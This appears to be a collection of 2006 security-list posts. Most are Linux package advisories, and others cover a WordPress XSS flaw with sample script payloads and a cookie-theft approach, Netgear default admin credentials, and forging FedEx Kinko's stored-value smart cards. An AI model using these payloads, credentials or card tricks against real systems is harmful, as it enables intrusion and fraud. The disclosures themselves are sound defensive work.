[FLSA-2006:177326] Updated mod_auth_pgsql package fixes security issue
- Fedora Legacy Update Advisory Synopsis: Updated mod_auth_pgsql package fixes security issue Advisory ID: FLSA:177326 Issue date:2006-02-27 Product: Fedora Core Keywords: Bugfix CVE Names: CVE-2005-3656 - - 1. Topic: An updated mod_auth_pgsql package that fixes a format string flaw is now available. The mod_auth_pgsql package is an httpd module that allows user authentication against information stored in a PostgreSQL database. 2. Relevant releases/architectures: Fedora Core 1 - i386 Fedora Core 2 - i386 3. Problem description: Several format string flaws were found in the way mod_auth_pgsql logs information. It may be possible for a remote attacker to execute arbitrary code as the 'apache' user if mod_auth_pgsql is used for user authentication. The Common Vulnerabilities and Exposures project assigned the name CVE-2005-3656 to this issue. Please note that this issue only affects servers which have mod_auth_pgsql installed and configured to perform user authentication against a PostgreSQL database. All users of mod_auth_pgsql should upgrade to these updated packages, which contain a backported patch to resolve this issue. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue: yum update or to use apt: apt-get update; apt-get upgrade This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/docs for directions on how to configure yum and apt-get. 5. Bug IDs fixed: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=177326 6. RPMs required: Fedora Core 1: SRPM: http://download.fedoralegacy.org/fedora/1/updates/SRPMS/mod_auth_pgsql-2.0.1-3.1.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/1/updates/i386/mod_auth_pgsql-2.0.1-3.1.legacy.i386.rpm Fedora Core 2: SRPM: http://download.fedoralegacy.org/fedora/2/updates/SRPMS/mod_auth_pgsql-2.0.1-4.2.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/2/updates/i386/mod_auth_pgsql-2.0.1-4.2.legacy.i386.rpm 7. Verification: SHA1 sum Package Name - e6ce19c8be5f4638e2050437c4529b0d4a0f5e1f fedora/1/updates/i386/mod_auth_pgsql-2.0.1-3.1.legacy.i386.rpm 119b3b6045eaa3b175ebe3d613daca8e9c81b35c fedora/1/updates/SRPMS/mod_auth_pgsql-2.0.1-3.1.legacy.src.rpm 8f9c2503b417db84b73483e6daca445c4789e4e4 fedora/2/updates/i386/mod_auth_pgsql-2.0.1-4.2.legacy.i386.rpm 52aabaff10fb0f862e1b96199facb7da046e94dc fedora/2/updates/SRPMS/mod_auth_pgsql-2.0.1-4.2.legacy.src.rpm These packages are GPG signed by Fedora Legacy for security. Our key is available from http://www.fedoralegacy.org/about/security.php You can verify each package with the following command: rpm --checksig -v filename If you only wish to verify that each package has not been corrupted or tampered with, examine only the sha1sum with the following command: sha1sum filename 8. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3656 9. Contact: The Fedora Legacy security contact is [EMAIL PROTECTED]. More project details at http://www.fedoralegacy.org - signature.asc Description: OpenPGP digital signature
[ MDKSA-2005:050 ] - Updated unzip packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2005:050 http://www.mandriva.com/security/ ___ Package : unzip Date: February 27, 2005 Affected: 10.2, 2006.0, Corporate 3.0, Multi Network Firewall 2.0 ___ Problem Description: A buffer overflow was foiund in how unzip handles file name arguments. If a user could tricked into processing a specially crafted, excessively long file name with unzip, an attacker could execute arbitrary code with the user's privileges. The updated packages have been patched to address this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4667 ___ Updated Packages: Mandriva Linux 10.2: 56ed53b98b79934d0f4292a4e067eae6 10.2/RPMS/unzip-5.51-1.3.102mdk.i586.rpm 33b9f50fab728e3b3c38c6d4f4002314 10.2/SRPMS/unzip-5.51-1.3.102mdk.src.rpm Mandriva Linux 10.2/X86_64: 4dde5ce45056867be10129f61df4 x86_64/10.2/RPMS/unzip-5.51-1.3.102mdk.x86_64.rpm 33b9f50fab728e3b3c38c6d4f4002314 x86_64/10.2/SRPMS/unzip-5.51-1.3.102mdk.src.rpm Mandriva Linux 2006.0: 3d3dcc95fccacd8033c452774994da1e 2006.0/RPMS/unzip-5.52-1.3.20060mdk.i586.rpm d45d6caaf656e5f04ce934a61a48a3e6 2006.0/SRPMS/unzip-5.52-1.3.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: b73080d55771a4a9572d9879b55db012 x86_64/2006.0/RPMS/unzip-5.52-1.3.20060mdk.x86_64.rpm d45d6caaf656e5f04ce934a61a48a3e6 x86_64/2006.0/SRPMS/unzip-5.52-1.3.20060mdk.src.rpm Corporate 3.0: 9ebf9de576ed5f9ca73362e7bea27849 corporate/3.0/RPMS/unzip-5.50-9.3.C30mdk.i586.rpm f3693c4ebec532b5a86f382981c81a4c corporate/3.0/SRPMS/unzip-5.50-9.3.C30mdk.src.rpm Corporate 3.0/X86_64: adce6e507a360b3132ec83f038d44bd7 x86_64/corporate/3.0/RPMS/unzip-5.50-9.3.C30mdk.x86_64.rpm f3693c4ebec532b5a86f382981c81a4c x86_64/corporate/3.0/SRPMS/unzip-5.50-9.3.C30mdk.src.rpm Multi Network Firewall 2.0: 075d5b7cefc2a93053e48dde5adb09ee mnf/2.0/RPMS/unzip-5.50-9.3.M20mdk.i586.rpm 12e0a95ab72239096c9110f8a1f98661 mnf/2.0/SRPMS/unzip-5.50-9.3.M20mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFEA6BNmqjQ0CJFipgRAoJjAJ9UN4JOLy01p4Q7EEFd00qZLscJewCgmd0S V/F+PgbvOJAUXE2mu9eDfKs= =sIYU -END PGP SIGNATURE-
[SECURITY] [DSA 983-1] New pdftohtml packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 983-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze February 28th, 2006 http://www.debian.org/security/faq - -- Package: pdftohtml Vulnerability : several Problem type : local (remote) Debian-specific: no Derek Noonburg has fixed several potential vulnerabilities in xpdf, which are also present in pdftohtml, a utility that translates PDF documents into HTML format. The old stable distribution (woody) does not contain pdftohtml packages. For the stable distribution (sarge) these problems have been fixed in version 0.36-11sarge2. For the unstable distribution (sid) these problems have been fixed in version 0.36-12. We recommend that you upgrade your gpdf package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2.dsc Size/MD5 checksum: 602 8dc87f9f04bf4e95d628a81540b5320e http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2.diff.gz Size/MD5 checksum:11953 aa4fe47eeec4ff81df92aab8f218f1f1 http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36.orig.tar.gz Size/MD5 checksum: 300922 75ad095bb51e1f66c9f7691e6af12f44 Alpha architecture: http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_alpha.deb Size/MD5 checksum: 314142 b5bd8a038769a31b74bc9baf7498 AMD64 architecture: http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_amd64.deb Size/MD5 checksum: 259728 a16f018455f8e3409399f9123af3c17a ARM architecture: http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_arm.deb Size/MD5 checksum: 266500 bbf302ca14ddad34769b0b8a5822d139 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_i386.deb Size/MD5 checksum: 253988 fd6e84484e62b90ff4eb419bdff63044 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_ia64.deb Size/MD5 checksum: 374206 900ea16bffd41ff59272bab4e89077a9 HP Precision architecture: http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_hppa.deb Size/MD5 checksum: 330356 4bf2182b3dc9f1269efb039c07fceea3 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_m68k.deb Size/MD5 checksum: 234812 34eb54fb6c07676aee15a9cc15110c28 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_mips.deb Size/MD5 checksum: 311482 2540b6b4c0b523087a40fb4ef7b57c46 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_mipsel.deb Size/MD5 checksum: 307188 16034038f8c3c206623702c4b3695b69 PowerPC architecture: http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_powerpc.deb Size/MD5 checksum: 269634 4053b1c0d6c76ca5c94ee97df412b5e5 IBM S/390 architecture: http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_s390.deb Size/MD5 checksum: 242482 ff9f29460ad1cb56b4c92dfd3e1e2d57 Sun Sparc architecture: http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_sparc.deb Size/MD5 checksum: 245378 d1ecf4c546240dab174947827b01766e These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFEBCZ5W5ql+IAeqTIRAhc3AJ98FvheYHaNnpIW4lCYjqsVD0JDmQCeO54D 8x13RBAhHVkh9GvAHmI7Sx8= =KfUo -END PGP SIGNATURE-
[FLSA-2006:177694] Updated auth_ldap package fixes security issue
- Fedora Legacy Update Advisory Synopsis: Updated auth_ldap package fixes security issue Advisory ID: FLSA:177694 Issue date:2006-02-27 Product: Red Hat Linux Keywords: Bugfix CVE Names: CVE-2006-0150 - - 1. Topic: An updated auth_ldap package that fixes a format string security issue is now available for Red Hat Linux 7.3. The auth_ldap package is an httpd module that allows user authentication against information stored in an LDAP database. 2. Relevant releases/architectures: Red Hat Linux 7.3 - i386 3. Problem description: A format string flaw was found in the way auth_ldap logs information. It may be possible for a remote attacker to execute arbitrary code as the 'apache' user if auth_ldap is used for user authentication. The Common Vulnerabilities and Exposures project (cve.mitre.org) assigned the name CVE-2006-0150 to this issue. Note that this issue only affects servers that have auth_ldap installed and configured to perform user authentication against an LDAP database. All users of auth_ldap should upgrade to this updated package, which contains a backported patch to resolve this issue. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue: yum update or to use apt: apt-get update; apt-get upgrade This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/docs for directions on how to configure yum and apt-get. 5. Bug IDs fixed: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=177694 6. RPMs required: Red Hat Linux 7.3: SRPM: http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/auth_ldap-1.6.0-4.2.legacy.src.rpm i386: http://download.fedoralegacy.org/redhat/7.3/updates/i386/auth_ldap-1.6.0-4.2.legacy.i386.rpm 7. Verification: SHA1 sum Package Name - 38f70135bc17c313fecdb81f61e776ac032b796e redhat/7.3/updates/i386/auth_ldap-1.6.0-4.2.legacy.i386.rpm 78b7ee876d5b900ff5268b1a396a59ca9f2385f0 redhat/7.3/updates/SRPMS/auth_ldap-1.6.0-4.2.legacy.src.rpm These packages are GPG signed by Fedora Legacy for security. Our key is available from http://www.fedoralegacy.org/about/security.php You can verify each package with the following command: rpm --checksig -v filename If you only wish to verify that each package has not been corrupted or tampered with, examine only the sha1sum with the following command: sha1sum filename 8. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0150 9. Contact: The Fedora Legacy security contact is [EMAIL PROTECTED]. More project details at http://www.fedoralegacy.org - signature.asc Description: OpenPGP digital signature
[FLSA-2006:157366] Updated PostgreSQL packages fix security issues
- Fedora Legacy Update Advisory Synopsis: Updated PostgreSQL packages fix security issues Advisory ID: FLSA:157366 Issue date:2006-02-27 Product: Red Hat Linux, Fedora Core Keywords: Bugfix CVE Names: CVE-2005-1409 CVE-2005-1410 - - 1. Topic: Updated postgresql packages that fix several security vulnerabilities and risks of data loss are now available. PostgreSQL is an advanced Object-Relational database management system (DBMS) that supports almost all SQL constructs (including transactions, subselects and user-defined types and functions). 2. Relevant releases/architectures: Red Hat Linux 9 - i386 Fedora Core 1 - i386 Fedora Core 2 - i386 3. Problem description: The PostgreSQL community discovered two distinct errors in initial system catalog entries that could allow authorized database users to crash the database and possibly escalate their privileges. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2005-1409 and CVE-2005-1410 to these issues. Although installing this update will protect new (freshly initdb'd) database installations from these errors, administrators MUST TAKE MANUAL ACTION to repair the errors in pre-existing databases. The appropriate procedures are explained at http://www.postgresql.org/docs/8.0/static/release-7-4-8.html for Fedora Core 2 users, or http://www.postgresql.org/docs/8.0/static/release-7-3-10.html for Fedora Core 1 and Red Hat Linux 9 users. This update also includes fixes for several other errors, including two race conditions that could result in apparent data inconsistency or actual data loss. All users of PostgreSQL are advised to upgrade to these updated packages and to apply the recommended manual corrections to existing databases. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue: yum update or to use apt: apt-get update; apt-get upgrade This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/docs for directions on how to configure yum and apt-get. 5. Bug IDs fixed: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=157366 6. RPMs required: Red Hat Linux 9: SRPM: http://download.fedoralegacy.org/redhat/9/updates/SRPMS/postgresql-7.3.10-0.90.1.legacy.src.rpm i386: http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-7.3.10-0.90.1.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-contrib-7.3.10-0.90.1.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-devel-7.3.10-0.90.1.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-docs-7.3.10-0.90.1.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-jdbc-7.3.10-0.90.1.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-libs-7.3.10-0.90.1.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-pl-7.3.10-0.90.1.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-python-7.3.10-0.90.1.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-server-7.3.10-0.90.1.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-tcl-7.3.10-0.90.1.legacy.i386.rpm http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-test-7.3.10-0.90.1.legacy.i386.rpm Fedora Core 1: SRPM: http://download.fedoralegacy.org/fedora/1/updates/SRPMS/postgresql-7.3.10-1.1.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-7.3.10-1.1.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-contrib-7.3.10-1.1.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-devel-7.3.10-1.1.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-docs-7.3.10-1.1.legacy.i386.rpm http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-jdbc-7.3.10-1.1.legacy.i386.rpm
WordPress 2.0.1 Multiple Vulnerabilities
/* --- [N]eo [S]ecurity [T]eam [NST]® WordPress 2.0.1 Multiple Vulnerabilities --- Program : WordPress 2.0 Homepage: http://www.wordpress.org Vulnerable Versions: WordPress 2.0.1 lower ones Risk: Critical! Impact: XSS, Full Path Disclosure, Directory Listing - WordPress 2.0.1 Multiple Vulnerabilities - --- - Description --- WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the same time. - Tested --- Tested in localhost many blogs - Bug --- The vendor was contacted about some other coding errors that are not described here, the vendor was noticed about these bugs when this advisory was published. + Multiple XSS + There're multiple XSS in `post comment': [1] `name' variable is not filtered when it's assigned to `value' on the `input' in the form when the comment it's posted. [2] Happends the same as [1] with `website' variable. [3] `comment', this variable only filtered and ' chars, this makes possible to use and , thus this permit an attacker to inject any HTML (or script) code that he/she want but without any or ' character, this only happends if the user that post the comment it's the admin (any registered kind of `user'). If you (or victim) is a unregistered user, you can use and ' in your HTML/script Injection using `name' or `website' variables, but if the victim is the admin or a registered user these 2 fields described above aren't availabe in the form so you cannot even give a value to them. The only remaining option it's to use the `comment' variable but here we have the problem that we cannot use or ' in HTML/SCRIPT Injected and we have to make the admin to post the comment (POST method). + Full path disclosure Directory listing + When I discovered this bug, I reported it to some pepople before public disclosure, I was noticed that this isn't new and I decided to look why they haven't patch this bug. As this bug it isn't patched yet, I tryed to know why and I found something like this in their forum (I don't know if the person that posted this was the admin but it gives the explanation): (Something like the following, it's not textual). `... these bugs are caused by badly configured .ini file, it's not a bug generated by the script so it cannot be accepted as a bug of WordPress...'. This is not an acceptable answer, if you think it is, a bug caused because of register_globals is Off it's .ini fault and not the script, they have to be kidding, if they want to make good software, they have to make as far as the language can, to prevent all bugs. There're multiple files that don't check if they are been call directly. This is a problem because they expect that functions that the script is going to be called to be declared. This kind of bug it's taken as a Low Risk bug, but it can help to future attacks. - Exploit --- -- Cross Site Scripting (XSS) PoC: [1] Post a comment with the following values (as unregistered user): (No possible profit) Name : scriptalert(WordPress PoC from);/script Mail : [EMAIL PROTECTED] Website: scriptalert([N]eo[S]ecurity[T]eam www.neosecurityteam.net);/script Comment: www.neosecurityteam.net/foro/ The injected HTML code only affects the user that posted it, not others. [2] This way it's more intresting and useful. In this case the HTML Injected will stay in the board affecting each person who see it. But we have two problems: [I ]- This comment must be posted by the admin [II]- We only can use the `comment' field, because the admin form to make the comment doesn't need the `name' or `website'. Also the injected code cannot have any or ' chars. Here are my solutions: [I ]- We cannot give to the admin a `malicius' URL to steal the cookie because it isn't via GET, it's via POST. So the solution it's to make a copy form of the real one and set the default values to the corresonding field (`comment') to make the stealing. Also make the form submit itself when the page loads. Thus, we give the admin the URL of this form and he/she will post the comment with the values we set before. :) [II]- We can only use this field to make the injection, the `big' problem its that we cannot use or ' chars wich means that something like window.location = http://www.google.com.uy;; won't work. Here are some real examples: - scriptalert(document.cookie)/script -
[FLSA-2006:175818] Updated udev packages fix a security issue
- Fedora Legacy Update Advisory Synopsis: Updated udev packages fix a security issue Advisory ID: FLSA:175818 Issue date:2006-02-27 Product: Fedora Core Keywords: Bugfix CVE Names: CVE-2005-3631 - - 1. Topic: Updated udev packages that fix a security issue are now available. The udev package contains an implementation of devfs in userspace using sysfs and /sbin/hotplug. 2. Relevant releases/architectures: Fedora Core 2 - i386 Fedora Core 3 - i386, x86_64 3. Problem description: Richard Cunningham discovered a flaw in the way udev sets permissions on various files in /dev/input. It may be possible for an authenticated attacker to gather sensitive data entered by a user at the console, such as passwords. The Common Vulnerabilities and Exposures project has assigned the name CVE-2005-3631 to this issue. All users of udev should upgrade to these updated packages, which contain a backported patch and are not vulnerable to this issue. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue: yum update or to use apt: apt-get update; apt-get upgrade This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/docs for directions on how to configure yum and apt-get. 5. Bug IDs fixed: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=175818 6. RPMs required: Fedora Core 2: SRPM: http://download.fedoralegacy.org/fedora/2/updates/SRPMS/udev-024-6.2.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/2/updates/i386/udev-024-6.2.legacy.i386.rpm Fedora Core 3: SRPM: http://download.fedoralegacy.org/fedora/3/updates/SRPMS/udev-039-10.FC3.9.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/3/updates/i386/udev-039-10.FC3.9.legacy.i386.rpm x86_64: http://download.fedoralegacy.org/fedora/3/updates/x86_64/udev-039-10.FC3.9.legacy.x86_64.rpm 7. Verification: SHA1 sum Package Name - d2b2850b4066a595a4d3c162e151dc27c5b43198 fedora/2/updates/i386/udev-024-6.2.legacy.i386.rpm 9ed5ef68d64987f8f644da065399d6885e7e1176 fedora/2/updates/SRPMS/udev-024-6.2.legacy.src.rpm a2682a89f6fe03c2f2c2401caa511c299c1ae1cc fedora/3/updates/i386/udev-039-10.FC3.9.legacy.i386.rpm fbcf92e15337b34511d4a305100d6797d644a84e fedora/3/updates/x86_64/udev-039-10.FC3.9.legacy.x86_64.rpm fe4e15a6ac3d4d80ce3db01f08a75c93985964e8 fedora/3/updates/SRPMS/udev-039-10.FC3.9.legacy.src.rpm These packages are GPG signed by Fedora Legacy for security. Our key is available from http://www.fedoralegacy.org/about/security.php You can verify each package with the following command: rpm --checksig -v filename If you only wish to verify that each package has not been corrupted or tampered with, examine only the sha1sum with the following command: sha1sum filename 8. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3631 9. Contact: The Fedora Legacy security contact is [EMAIL PROTECTED]. More project details at http://www.fedoralegacy.org - signature.asc Description: OpenPGP digital signature
Re: NETGEAR WGT624 Wireless DSL router default user name/password vulnerability
Not my WG602v2. [EMAIL PROTECTED] wrote: Netgear WG602 reportedly contains a default administrative account. This issue can allow a remote attacker to gain administrative access to the device. super_username=Gearguy super_passwd=Geardog
Fedex Kinkos Smart Card Authentication Bypass
Abstract: - The ExpressPay stored-value card system used by FedEx Kinko's is vulnerable to attack. An attacker who gains the ability to alter the data stored on the card can use FedEx Kinko's services fraudulently and anonymously, and can even obtain cash from the store. Description: The FedEx Kinko's ExpressPay system, developed by enTrac Technologies of Toronto, Ontario, is based on a Siemens / Infineon SLE4442 memory chip card. The data stored on this card is freely rewritable once a three-byte security code has been presented to the card's security logic. Neither this security code nor the data stored on the card is encrypted; anyone able to obtain the security code is free to rewrite the data stored on the card using an inexpensive commercially available smart card reader/writer. The first thirty-two bytes of the memory chip card are writable and subsequently permanently write-protectable (in this application, these bytes are write-protected), and contain a header which identifies the card as an ExpressPay stored-value card. Bytes 0x20 through 0x27 contain the value stored on the card, represented in IEEE 754 double-precision floating point format. Bytes 0x60 through 0x6A contain the card's eleven-digit serial number stored as unsigned zoned-decimal ASCII; digits 0x60 through 0x63 are the store number the card was initially issued at, and the remaining seven digits are assigned sequentially at the moment of first issue. A timestamp indicating date and time of issue are located from 0x30 through 0x37, and is repeated from 0xC7 through 0xCE. In order to write to the card, a three-byte security code must be presented in a specific sequence of commands as outlined by the SLE4442's white paper. By soldering wires to the contact points of the card and then connecting those wires to an inexpensive logic analyzer, an attacker can sniff the three-byte code as the kiosk or a card terminal prepares to write data to the card. This security code appears to be the same across all FedEx Kinko's ExpressPay cards currently in circulation. Once the three-byte code is known to the attacker, the card's stored value and serial number can be changed to any value. The ExpressPay system appears to implicitly trust the value stored on the card, regardless of what that value actually is. The system will also accept cards with obviously fake serial numbers (e.g. a non-existent store number followed by all nines). Using these altered cards, xeroxes can be made from any machine with a card reader, and computers can be rented anonymously and indefinitely. Most disturbing, however, is that since stored-value cards can be cashed out by an employee at the register at any time, an attacker could cash out altered cards obtained at little or no monetary cost. If a card is cashed out, its serial number does not appear to be invalidated in the system. If an attacker were to clone a known good card and cash it out, the clone would still be usable. Tested Vendors: --- - FedEx Kinko's Suspected Vendors: -- - Any client of enTrac Technologies who uses the ExpressPay stored-value card system. - Any company which uses a stored-value card system based on the SLE4442 Vendor and Patch Information: - Proof-of-concept of the initial security vulnerability was achieved on 8 February 2006, with research into the ramifications continuing through 12 February. Copies of this report were sent to both FedEx Kinko's and enTrac Technologies on 15 February; a read receipt was returned from enTrac on 19 February, while no receipt has yet been received from FedEx Kinko's. Solution: - - Encrypt data before storing it on the SLE4442 card, or migrate to a system which uses cards which have built-in encryption functionality. - Verify that the stored value on the card does not significantly differ from a reference value stored in a database. - Do not allow the use of cards with invalid serial numbers. - Invalidate serial numbers of cards that are cashed out. Credits: Strom Carlson, Secure Science Corporation: Hardware Security Division [EMAIL PROTECTED]
[FLSA-2006:181014] Updated gnutls packages fix a security issue
- Fedora Legacy Update Advisory Synopsis: Updated gnutls packages fix a security issue Advisory ID: FLSA:181014 Issue date:2006-02-27 Product: Fedora Core Keywords: Bugfix CVE Names: CVE-2006-0645 - - 1. Topic: Updated gnutls packages that fix a security issue are now available. The GNU TLS Library provides support for cryptographic algorithms and protocols such as TLS. GNU TLS includes Libtasn1, a library developed for ASN.1 structures management that includes DER encoding and decoding. 2. Relevant releases/architectures: Fedora Core 3 - i386, x86_64 3. Problem description: Several flaws were found in the way libtasn1 decodes DER. An attacker could create a carefully crafted invalid X.509 certificate in such a way that could trigger this flaw if parsed by an application that uses GNU TLS. This could lead to a denial of service (application crash). It is not certain if this issue could be escalated to allow arbitrary code execution. The Common Vulnerabilities and Exposures project assigned the name CVE-2006-0645 to this issue. Users are advised to upgrade to these updated packages, which contain a backported patch from the GNU TLS maintainers to correct this issue. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue: yum update or to use apt: apt-get update; apt-get upgrade This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/docs for directions on how to configure yum and apt-get. 5. Bug IDs fixed: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=181014 6. RPMs required: Fedora Core 3: SRPM: http://download.fedoralegacy.org/fedora/3/updates/SRPMS/gnutls-1.0.20-3.1.3.legacy.src.rpm i386: http://download.fedoralegacy.org/fedora/3/updates/i386/gnutls-1.0.20-3.1.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/3/updates/i386/gnutls-devel-1.0.20-3.1.3.legacy.i386.rpm x86_64: http://download.fedoralegacy.org/fedora/3/updates/x86_64/gnutls-1.0.20-3.1.3.legacy.i386.rpm http://download.fedoralegacy.org/fedora/3/updates/x86_64/gnutls-1.0.20-3.1.3.legacy.x86_64.rpm http://download.fedoralegacy.org/fedora/3/updates/x86_64/gnutls-devel-1.0.20-3.1.3.legacy.x86_64.rpm 7. Verification: SHA1 sum Package Name - 87b93af583ea3abaa48337b0a8c71cba97a45410 fedora/3/updates/i386/gnutls-1.0.20-3.1.3.legacy.i386.rpm dca7e6e11093d7b8528d82cc9c3f5f1b1c78ea23 fedora/3/updates/i386/gnutls-devel-1.0.20-3.1.3.legacy.i386.rpm 87b93af583ea3abaa48337b0a8c71cba97a45410 fedora/3/updates/x86_64/gnutls-1.0.20-3.1.3.legacy.i386.rpm 742be40634dc2a32b245f78caf610d0a6b45cb75 fedora/3/updates/x86_64/gnutls-1.0.20-3.1.3.legacy.x86_64.rpm 762630c8973f02bcc934adc8f5a946383f8479cc fedora/3/updates/x86_64/gnutls-devel-1.0.20-3.1.3.legacy.x86_64.rpm 